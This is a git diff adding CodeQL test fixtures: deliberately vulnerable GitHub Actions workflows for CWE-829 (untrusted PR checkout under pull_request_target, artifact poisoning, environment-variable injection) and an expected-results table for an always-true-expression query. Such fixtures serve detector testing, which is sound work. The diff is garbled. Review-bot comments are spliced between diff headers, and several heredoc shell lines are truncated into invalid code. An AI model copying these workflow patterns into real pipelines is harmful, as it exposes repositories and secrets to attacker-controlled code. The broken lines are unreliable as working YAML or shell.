@@ -0,0 +1,11 @@ +| .github/workflows/test1.yml:15:13:19:13 | \| | Expression always evaluates to true | +| .github/workflows/test1.yml:34:13:34:39 | ${{ 1 = ... == 2 }} | Expression always evaluates to true | +| .github/workflows/test1.yml:45:13:48:24 | > | Expression always evaluates to true | +| .github/workflows/test1.yml:56:15:56:31 | " ${{ 1 == 2 }}" | Expression always evaluates to true | +| .github/workflows/test1.yml:59:15:59:31 | " ${{ 1 == 2 }}" | Expression always evaluates to true | +| .github/workflows/test1.yml:79:13:82:14 | \|+ | Expression always evaluates to true | +| .github/workflows/test1.yml:85:13:88:14 | >+ | Expression always evaluates to true | +| .github/workflows/test1.yml:91:13:91:45 | ${{ git ... = 'foo' | Expression always evaluates to true | +| .github/workflows/test1.yml:94:13:94:121 | ${{ con ... = 'foo' | Expression always evaluates to true | +| .github/workflows/test1.yml:97:13:97:64 | ${{ has ... } != "" | Expression always evaluates to true | +| .github/workflows/test1.yml:100:13:102:63 | > | Expression always evaluates to true | diff --git a/actions/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueHigh.qlref b/actions/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueHigh.qlref new file mode 100644 index 000000000000..f12135bd1b88 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueHigh.qlref @@ -0,0 +1 @@ +Security/CWE-571/ExpressionIsAlwaysTrueHigh.ql diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/actions/dangerous-git-checkout/action.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/actions/dangerous-git-checkout/action.yml new file mode 100644 index 000000000000..cd4f0fe660aa --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/actions/dangerous-git-checkout/action.yml 
@@ -0,0 +1,13 @@
+name: Dangerous git Checkout
+description: "Git Checkout from PR code so we can run checks from forks"
+runs:
+ using: "composite"
+ steps:
+ - name: Checkout repo
+ uses: actions/checkout@4
+ with:
+ ref: ${{ github.event.pull_request.head.sha }}
+ fetch-depth: 2
+ - run: echo "foo"
+ shell: bash
+
diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact-2/action.yaml b/actions/ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact-2/action.yaml
new file mode 100644
index 000000000000..4241647d3e11
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact-2/action.yaml
@@ -0,0 +1,32 @@
+name: DownloadArtifacts
+description: 'Downloads and unarchives artifacts for a workflow that runs on workflow_run so that it can use its data'
+runs:
+ using: "composite"
+ steps:
+ - uses: actions/github-script@60a0d83039c74a4aee543508d2ffcb1c3799cdea # v7.0.1
+ with:
+ script: |
+ let allArtifacts = await github.rest.actions.listWorkflowRunArtifacts({
+ owner: context.repo.owner,
+ repo: context.repo.repo,
+ run_id: context.payload.workflow_run.id,
+ });
+ let matchArtifact = allArtifacts.data.artifacts.filter((artifact) => {
+ return artifact.name == "artifacts"
+ })[0];
+ let download = await github.rest.actions.downloadArtifact({
+ owner: context.repo.owner,
+ repo: context.repo.repo,
+ artifact_id: matchArtifact.id,
+ archive_format: 'zip',
+ });
+ let fs = require('fs');
+ fs.writeFileSync(`/tmp/artifacts.zip`, Buffer.from(download.data));
+ - run: |
+ mkdir -p /tmp/artifacts
+ unzip /tmp/artifacts.zip
+ shell: bash
+ - run: |
+ echo "Downloaded artifacts:"
+ ls -ablh
+ shell: bash
diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact/action.yaml b/actions/ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact/action.yaml
new file mode 100644
index 000000000000..0c2059521020
--- /dev/null
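Review bot: `uses: actions/checkout@4` in the "Checkout repo" step of dangerous-git-checkout/action.yml pins a ref that does not exist; the action is tagged `v4`-style, and the other fixtures in this change write `actions/checkout@v4`, so a runner would fail to resolve the action before the step executes. Unless the bad ref is deliberate, change the line to `uses: actions/checkout@v4`; if it is deliberate, a YAML comment on that line saying so would stop the next reader from "fixing" it. The download-artifact fixtures on the same physical line look consistent with each other and need no change.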
+++ b/actions/ql/test/query-tests/Security/CWE-829/.github/actions/download-artifact/action.yaml
@@ -0,0 +1,32 @@
+name: DownloadArtifacts
+description: 'Downloads and unarchives artifacts for a workflow that runs on workflow_run so that it can use its data'
+runs:
+ using: "composite"
+ steps:
+ - uses: actions/github-script@60a0d83039c74a4aee543508d2ffcb1c3799cdea # v7.0.1
+ with:
+ script: |
+ let allArtifacts = await github.rest.actions.listWorkflowRunArtifacts({
+ owner: context.repo.owner,
+ repo: context.repo.repo,
+ run_id: context.payload.workflow_run.id,
+ });
+ let matchArtifact = allArtifacts.data.artifacts.filter((artifact) => {
+ return artifact.name == "artifacts"
+ })[0];
+ let download = await github.rest.actions.downloadArtifact({
+ owner: context.repo.owner,
+ repo: context.repo.repo,
+ artifact_id: matchArtifact.id,
+ archive_format: 'zip',
+ });
+ let fs = require('fs');
+ fs.writeFileSync(`/tmp/artifacts.zip`, Buffer.from(download.data));
+ - run: |
+ mkdir -p /tmp/artifacts
+ unzip /tmp/artifacts.zip -d /tmp/artifacts
+ shell: bash
+ - run: |
+ echo "Downloaded artifacts:"
+ ls -ablh /tmp/artifacts
+ shell: bash
diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/actor_trusted_checkout.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/actor_trusted_checkout.yml
new file mode 100644
index 000000000000..08a25646d6ae
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/actor_trusted_checkout.yml
@@ -0,0 +1,26 @@
+on:
+ pull_request_target
+
+jobs:
+ build:
+ name: Build and test
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v2
+ if: ${{ github.actor == "admin" }}
+ with:
+ ref: ${{ github.event.pull_request.head.sha }}
+
+ - uses: actions/setup-node@v1
+ - run: |
+ npm install
+ npm build
+
+ - uses: completely/fakeaction@v2
+ with:
+ arg1: ${{ secrets.supersecret }}
+
+ - uses: fakerepo/comment-on-pr@v1
+ with:
+ message: |
+ Thank you!
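Review bot: The guard `if: ${{ github.actor == "admin" }}` in actor_trusted_checkout.yml uses a double-quoted string literal, which GitHub's expression syntax does not accept (string literals must be single-quoted, as `'dependabot[bot]'` is written elsewhere in this change), so the workflow would be rejected when parsed rather than exercising the trusted-actor check the fixture name describes. If the fixture is meant to model a valid actor guard, write it as `if: ${{ github.actor == 'admin' }}`; if the malformed form is intentional, a comment such as `# intentionally invalid literal: double quotes are not expression syntax` would make that clear.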
diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning101.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning101.yml
new file mode 100644
index 000000000000..7eaee9fa6d38
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning101.yml
@@ -0,0 +1,19 @@
+name: Pull Request Open
+
+on:
+ pull_request_target:
+
+jobs:
+ test:
+ runs-on: ubuntu-latest
+ steps:
+ - name: download pr artifact
+ uses: dawidd6/action-download-artifact@v2
+ with:
+ workflow: ${{github.event.workflow_run.workflow_id}}
+ run_id: ${{github.event.workflow_run.id}}
+ name: artifact
+ - id: pr_number
+ run: |
+ PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)
+ echo "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT
diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning11.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning11.yml
new file mode 100644
index 000000000000..f8d3736dba51
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning11.yml
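Review bot: artifactpoisoning101.yml triggers on `pull_request_target` but passes `${{github.event.workflow_run.workflow_id}}` and `${{github.event.workflow_run.id}}` to dawidd6/action-download-artifact; the `workflow_run` payload is only present for `workflow_run` events, so on this trigger both inputs evaluate to empty strings. If the fixture is meant to model an artifact consumed from a previous run, as artifactpoisoning11 and its siblings do, the trigger should presumably be `workflow_run:`; if the mismatch is deliberate test input, a one-line comment such as `# intentionally mis-triggered: workflow_run context is empty on pull_request_target` would keep it from being "corrected" later.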
@@ -0,0 +1,41 @@
+name: Pull Request Open
+
+on:
+ workflow_run:
+ workflows: ["Prev"]
+ types:
+ - completed
+
+jobs:
+ Download:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/github-script@v6
+ with:
+ script: |
+ let allArtifacts = await github.rest.actions.listWorkflowRunArtifacts({
+ owner: context.repo.owner,
+ repo: context.repo.repo,
+ run_id: context.payload.workflow_run.id,
+ });
+ let matchArtifact = allArtifacts.data.artifacts.filter((artifact) => {
+ return artifact.name == ""
+ })[0];
+ let download = await github.rest.actions.downloadArtifact({
+ owner: context.repo.owner,
+ repo: context.repo.repo,
+ artifact_id: matchArtifact.id,
+ archive_format: 'zip',
+ });
+ let fs = require('fs');
+ fs.writeFileSync(`${process.env.GITHUB_WORKSPACE}/sonarcloud-data.zip`, Buffer.from(download.data));
+ - name: Unzip
+ run: |
+ unzip sonarcloud-data.zip -d sonarcloud-data
+ ls -a sonarcloud-data
+ - name: Run command
+ run:
+ ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build
+
+
+
diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning12.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning12.yml
new file mode 100644
index 000000000000..aa884b7eca74
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning12.yml
@@ -0,0 +1,40 @@
+name: Pull Request Open
+
+on:
+ workflow_run:
+ workflows: ["Prev"]
+ types:
+ - completed
+
+jobs:
+ Download:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/github-script@v6
+ with:
+ script: |
+ let allArtifacts = await github.rest.actions.listWorkflowRunArtifacts({
+ owner: context.repo.owner,
+ repo: context.repo.repo,
+ run_id: context.payload.workflow_run.id,
+ });
+ let matchArtifact = allArtifacts.data.artifacts.filter((artifact) => {
+ return artifact.name == ""
+ })[0];
+ let download = await github.rest.actions.downloadArtifact({
+ owner: context.repo.owner,
+ repo: context.repo.repo,
+ artifact_id: matchArtifact.id,
+ archive_format: 'zip',
+ });
+ let fs = require('fs');
+ fs.writeFileSync(`${process.env.GITHUB_WORKSPACE}/sonarcloud-data.zip`, Buffer.from(download.data));
+ - name: Unzip
+ run: |
+ unzip sonarcloud-data.zip
+ ls -a sonarcloud-data
+ - name: Run command
+ run:
+ python foo/x.py
+
+
diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning21.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning21.yml
new file mode 100644
index 000000000000..e73548895d37
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning21.yml
@@ -0,0 +1,23 @@
+name: Pull Request Open
+
+on:
+ workflow_run:
+ workflows: ["Prev"]
+ types:
+ - completed
+
+jobs:
+ Download:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: dawidd6/action-download-artifact@v2
+ with:
+ name: artifact_name
+ workflow: wf.yml
+ path: foo
+ - name: Run command
+ run: |
+ sh foo/cmd
+
+
+
diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning22.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning22.yml
new file mode 100644
index 000000000000..ac970fff8404
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning22.yml
@@ -0,0 +1,21 @@
+name: Pull Request Open
+
+on:
+ workflow_run:
+ workflows: ["Prev"]
+ types:
+ - completed
+
+jobs:
+ Download:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: dawidd6/action-download-artifact@v2
+ with:
+ name: artifact_name
+ workflow: wf.yml
+ - name: Run command
+ run: sh cmd
+
+
+
diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning31.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning31.yml
new file mode 100644
index 000000000000..0e7c6f97cf5d
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning31.yml
@@ -0,0 +1,22 @@
+name: Pull Request Open
+
+on:
+ workflow_run:
+ workflows: ["Prev"]
+ types:
+ - completed
+
+jobs:
+ Download:
+ runs-on: ubuntu-latest
+ steps:
+ - run: |
+ gh run download "${{github.event.workflow_run.id}}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name"
+ - name: Unzip
+ run: |
+ unzip artifact_name.zip -d foo
+ - name: Run command
+ run: ./foo/cmd
+
+
+
diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning32.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning32.yml
new file mode 100644
index 000000000000..7a837ee42d2c
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning32.yml
@@ -0,0 +1,21 @@
+name: Pull Request Open
+
+on:
+ workflow_run:
+ workflows: ["Prev"]
+ types:
+ - completed
+
+jobs:
+ Download:
+ runs-on: ubuntu-latest
+ steps:
+ - run: |
+ gh run download "${{github.event.workflow_run.id}}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name" --dir foo
+ unzip artifact_name.zip -d bar
+ - name: Run command
+ run: |
+ ./bar/cmd
+
+
+
diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning33.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning33.yml
new file mode 100644
index 000000000000..39ec063c7b64
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning33.yml
@@ -0,0 +1,21 @@
+name: Pull Request Open
+
+on:
+ workflow_run:
+ workflows: ["Prev"]
+ types:
+ - completed
+
+jobs:
+ Download:
+ runs-on: ubuntu-latest
+ steps:
+ - run: |
+ gh run download "${{github.event.workflow_run.id}}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name" --dir foo
+ unzip foo/artifact_name.zip
+ - name: Run command
+ run: |
+ ./bar/cmd
+
+
+
diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning34.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning34.yml
new file mode 100644
index 000000000000..905a4eaccb17
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning34.yml
@@ -0,0 +1,25 @@
+name: Pull Request Open
+
+on:
+ workflow_run:
+ workflows: ["Prev"]
+ types:
+ - completed
+
+jobs:
+ Download:
+ runs-on: ubuntu-latest
+ steps:
+ - run: |
+ gh run download "${{github.event.workflow_run.id}}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name" --dir foo
+ unzip foo/artifact_name.zip
+ - name: Setup Node.js
+ uses: actions/setup-node@v4
+ with:
+ node-version: 21
+ - run: |
+ npm install
+ npm run lint
+
+
+
diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning41.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning41.yml
new file mode 100644
index 000000000000..afa3e15132e3
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning41.yml
@@ -0,0 +1,25 @@
+name: Pull Request Open
+
+on:
+ workflow_run:
+ workflows: ["Prev"]
+ types:
+ - completed
+
+jobs:
+ Download:
+ runs-on: ubuntu-latest
+ steps:
+ - run: |
+ artifacts_url=${{ github.event.workflow_run.artifacts_url }}
+ gh api "$artifacts_url" -q '.artifacts[] | [.name, .archive_download_url] | @tsv' | while read artifact
+ do
+ IFS=$'\t' read name url <<< "$artifact"
+ gh api $url > "$name.zip"
+ unzip -d "foo" "$name.zip"
+ done
+ - name: Run command
+ run: ./foo/cmd
+
+
+
diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning42.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning42.yml
new file mode 100644
index 000000000000..d3100d46edc7
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning42.yml
@@ -0,0 +1,25 @@
+name: Pull Request Open
+
+on:
+ workflow_run:
+ workflows: ["Prev"]
+ types:
+ - completed
+
+jobs:
+ Download:
+ runs-on: ubuntu-latest
+ steps:
+ - run: |
+ artifacts_url=${{ github.event.workflow_run.artifacts_url }}
+ gh api "$artifacts_url" -q '.artifacts[] | [.name, .archive_download_url] | @tsv' | while read artifact
+ do
+ IFS=$'\t' read name url <<< "$artifact"
+ gh api $url > "$name.zip"
+ unzip "$name.zip"
+ done
+ - name: Run command
+ run: ./cmd
+
+
+
diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning51.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning51.yml
new file mode 100644
index 000000000000..71f590fbc9c7
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning51.yml
@@ -0,0 +1,20 @@
+name: Pull Request Open
+
+on:
+ workflow_run:
+ workflows: ["Prev"]
+ types:
+ - completed
+
+jobs:
+ Download:
+ runs-on: ubuntu-latest
+ steps:
+ - run: |
+ gh run download "${{github.event.workflow_run.id}}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name"
+ - name: Unzip
+ run: |
+ unzip artifact_name.zip -d foo
+ - name: Env Var Injection
+ run: |
+ echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV
diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning52.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning52.yml
new file mode 100644
index 000000000000..e4845a6f2f16
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning52.yml
@@ -0,0 +1,26 @@
+name: Pull Request Open
+
+on:
+ workflow_run:
+ workflows: ["Prev"]
+ types:
+ - completed
+
+jobs:
+ Download:
+ runs-on: ubuntu-latest
+ steps:
+ - run: |
+ gh run download "${{github.event.workflow_run.id}}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name"
+ - name: Unzip
+ run: |
+ unzip artifact_name.zip -d foo
+ - name: Env Var Injection
+ run: |
+ echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"
+ cat foo >> "$GITHUB_ENV"
+ echo "EOF" >> "${GITHUB_ENV}"
+
+
+
+
diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning53.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning53.yml
new file mode 100644
index 000000000000..67209267b5c5
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning53.yml
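Review bot: The multi-line `$GITHUB_ENV` write in artifactpoisoning52.yml's "Env Var Injection" step appears truncated: `echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"` has an unbalanced quote and no heredoc delimiter, yet the later `echo "EOF" >> "${GITHUB_ENV}"` closes one, which looks like `<<EOF" >` was lost somewhere between the author's editor and this rendering. artifactpoisoning53.yml has the same shape in `echo 'JSON_RESPONSE<> "$GITHUB_ENV"`, and its hunk declares 27 lines while fewer are visible, so the loss may be in the rendering rather than the commit. If the committed files really read this way they are not valid shell and will not exercise the multi-line env-write pattern the fixture names; the expected first line is presumably `echo "PACKAGES_FILE_LIST<<EOF" >> "${GITHUB_ENV}"`, with the 53 variant wrapped in `{ … } >> "$GITHUB_ENV"`.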
@@ -0,0 +1,27 @@
+name: Pull Request Open
+
+on:
+ workflow_run:
+ workflows: ["Prev"]
+ types:
+ - completed
+
+jobs:
+ Download:
+ runs-on: ubuntu-latest
+ steps:
+ - run: |
+ gh run download "${{github.event.workflow_run.id}}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name"
+ - name: Unzip
+ run: |
+ unzip artifact_name.zip -d foo
+ - run: |
+ {
+ echo 'JSON_RESPONSE<> "$GITHUB_ENV"
+
+
+
+
diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning71.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning71.yml
new file mode 100644
index 000000000000..8cb380ae0436
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning71.yml
@@ -0,0 +1,18 @@
+# Second Workflow
+# It consumes an artifact produced by the First Workflow
+
+on: workflow_run
+jobs:
+ my-second-job:
+ runs-on: ubuntu-latest
+ steps:
+ - name: download pr artifact
+ uses: dawidd6/action-download-artifact@v2
+ with:
+ workflow: ${{github.event.workflow_run.workflow_id}}
+ run_id: ${{github.event.workflow_run.id}}
+ name: artifact
+
+ - name: Use artifact
+ run: |
+ sed -f config foo.md > bar.md
diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning81.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning81.yml
new file mode 100644
index 000000000000..768f244c210f
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning81.yml
@@ -0,0 +1,31 @@
+name: elevate
+on:
+ - pull_request_target
+
+jobs:
+ job1:
+ runs-on: ubuntu-latest
+ permissions:
+ contents: read
+ steps:
+ - uses: actions/checkout@v4
+ with:
+ ref: ${{ github.event.pull_request.head.sha }}
+ - run: |
+ bash script.sh
+ - uses: actions/upload-artifact@v4
+ with:
+ name: results
+ path: results
+ retention-days: 1
+
+ job2:
+ runs-on: ubuntu-latest
+ needs: job1
+ permissions:
+ contents: write
+ steps:
+ - uses: actions/download-artifact@v3
+ with:
+ name: results
+ - run: python test.py
diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning82.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning82.yml
new file mode 100644
index 000000000000..6ae7f482f55f
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning82.yml
@@ -0,0 +1,31 @@
+name: elevate
+on:
+ - pull_request
+
+jobs:
+ job1:
+ runs-on: ubuntu-latest
+ permissions:
+ contents: read
+ steps:
+ - uses: actions/checkout@v4
+ with:
+ ref: ${{ github.event.pull_request.head.sha }}
+ - run: |
+ bash script.sh
+ - uses: actions/upload-artifact@v4
+ with:
+ name: results
+ path: results
+ retention-days: 1
+
+ job2:
+ runs-on: ubuntu-latest
+ needs: job1
+ permissions:
+ contents: write
+ steps:
+ - uses: actions/download-artifact@v4
+ with:
+ name: results
+ - run: python test.py
diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning91.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning91.yml
new file mode 100644
index 000000000000..af9f01b572f1
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning91.yml
@@ -0,0 +1,29 @@
+name: SnapshotPR
+on:
+ workflow_run:
+ workflows:
+ - ApprovalComment
+ types:
+ - completed
+jobs:
+ snapshot:
+ permissions:
+ id-token: write
+ pull-requests: write
+ statuses: write
+ if: github.event.workflow_run.conclusion == 'success'
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@9bb56186c3b09b4f86b1c65136769dd318469633 # v4.1.2
+ - uses: ./.github/actions/download-artifact
+ - id: metadata
+ run: |
+ pr_number="$(head -n 2 /tmp/artifacts/metadata.txt | tail -n 1)"
+ pr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"
+ echo PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"
+ echo PR_NUMBER="$pr_number" >> "$GITHUB_ENV"
+ - uses: actions/checkout@9bb56186c3b09b4f86b1c65136769dd318469633 # v4.1.2
+ with:
+ ref: ${{ env.PR_COMMIT }}
+ - uses: ./.github/actions/install-deps
+ - run: make snapshot
diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning92.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning92.yml
new file mode 100644
index 000000000000..e35bc73c3bda
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning92.yml
@@ -0,0 +1,29 @@
+name: SnapshotPR
+on:
+ workflow_run:
+ workflows:
+ - ApprovalComment
+ types:
+ - completed
+jobs:
+ snapshot:
+ permissions:
+ id-token: write
+ pull-requests: write
+ statuses: write
+ if: github.event.workflow_run.conclusion == 'success'
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@9bb56186c3b09b4f86b1c65136769dd318469633 # v4.1.2
+ - uses: ./.github/actions/download-artifact-2
+ - id: metadata
+ run: |
+ pr_number="$(head -n 2 /tmp/artifacts/metadata.txt | tail -n 1)"
+ pr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"
+ echo PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"
+ echo PR_NUMBER="$pr_number" >> "$GITHUB_ENV"
+ - uses: actions/checkout@9bb56186c3b09b4f86b1c65136769dd318469633 # v4.1.2
+ with:
+ ref: ${{ env.PR_COMMIT }}
+ - uses: ./.github/actions/install-deps
+ - run: make snapshot
diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/auto_ci.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/auto_ci.yml
new file mode 100644
index 000000000000..28ffab637f03
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/auto_ci.yml
@@ -0,0 +1,135 @@
+name: Python CI
+
+on:
+ push:
+ branches: [ master ]
+ pull_request_target:
+ branches: [ master, stable ]
+
+concurrency:
+ group: ${{ format('ci-{0}', github.head_ref && format('pr-{0}', github.event.pull_request.number) || github.sha) }}
+ cancel-in-progress: ${{ github.event_name == 'pull_request_target' }}
+
+jobs:
+ lint:
+ runs-on: ubuntu-latest
+ env:
+ min-python-version: "3.10"
+
+ steps:
+ - name: Checkout repository
+ uses: actions/checkout@v3
+ with:
+ fetch-depth: 0
+ ref: ${{ github.event.pull_request.head.ref }}
+ repository: ${{ github.event.pull_request.head.repo.full_name }}
+
+ - name: Set up Python ${{ env.min-python-version }}
+ uses: actions/setup-python@v2
+ with:
+ python-version: ${{ env.min-python-version }}
+
+ - name: Install dependencies
+ run: |
+ python -m pip install --upgrade pip
+ pip install -r requirements.txt
+
+ - name: Lint with flake8
+ run: flake8
+
+ - name: Check black formatting
+ run: black . --check
+ if: success() || failure()
+
+ - name: Check isort formatting
+ run: isort . --check
+ if: success() || failure()
+
+ - name: Check mypy formatting
+ run: mypy
+ if: success() || failure()
+
+ test:
+ permissions:
+ # Gives the action the necessary permissions for publishing new
+ # comments in pull requests. 
+ pull-requests: write
+ # Gives the action the necessary permissions for pushing data to the
+ # python-coverage-comment-action branch, and for editing existing
+ # comments (to avoid publishing multiple comments in the same PR)
+ contents: write
+ runs-on: ubuntu-latest
+ strategy:
+ matrix:
+ python-version: ["3.10"]
+
+ steps:
+ - name: Check out repository
+ uses: actions/checkout@v3
+ with:
+ fetch-depth: 0
+ ref: ${{ github.event.pull_request.head.ref || github.event.pull_request.base.ref }}
+ repository: ${{ github.event.pull_request.head.repo.full_name }}
+
+ - name: Set up Python ${{ matrix.python-version }}
+ uses: actions/setup-python@v2
+ with:
+ python-version: ${{ matrix.python-version }}
+
+ - name: Install dependencies
+ run: |
+ python -m pip install --upgrade pip
+ pip install -r requirements.txt
+
+ - name: Run unittest tests with coverage
+ run: |
+ pytest -n auto --cov=autogpt --cov-report term-missing --cov-branch --cov-report xml --cov-report term
+ env:
+ CI: true
+ PROXY: ${{ secrets.PROXY }}
+ AGENT_MODE: ${{ vars.AGENT_MODE }}
+ AGENT_TYPE: ${{ vars.AGENT_TYPE }}
+
+ - name: Upload coverage reports to Codecov
+ uses: codecov/codecov-action@v3
+
+ - name: Stage new files and commit
+ id: stage_files
+ run: |
+ git add tests
+ git diff --cached --quiet && echo "No changes to commit" && exit 0
+ git config user.email "github-actions@github.com"
+ git config user.name "GitHub Actions"
+ git commit -m "Add new cassettes"
+ TIMESTAMP_COMMIT=$(date +%Y%m%d%H%M%S) # generate a timestamp
+ echo "TIMESTAMP_COMMIT=TIMESTAMP_COMMIT" >> $GITHUB_ENV
+
+
+ - name: Create PR
+ id: create_pr
+ if: ${{ env.TIMESTAMP_COMMIT != null }}
+ uses: peter-evans/create-pull-request@v5
+ with:
+ commit-message: Update cassettes
+ branch: cassette-diff-PR-${{ github.event.pull_request.number }}-${{ env.TIMESTAMP_COMMIT }}
+ title: "Update cassette-diff-PR${{ github.event.pull_request.number }}-${{ env.TIMESTAMP_COMMIT }}"
+ body: "This PR updates the cassettes. 
Please merge it."
+
+
+ - name: Check PR
+ if: ${{ env.TIMESTAMP_COMMIT != null }}
+ run: |
+ echo "Pull Request Number - ${{ steps.create_pr.outputs.pull-request-number }}"
+ echo "Pull Request URL - ${{ steps.create_pr.outputs.pull-request-url }}"
+
+ - name: Comment PR URL in the current PR
+ if: ${{ env.TIMESTAMP_COMMIT != null }}
+ uses: thollander/actions-comment-pull-request@v2
+ with:
+ GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+ message: |
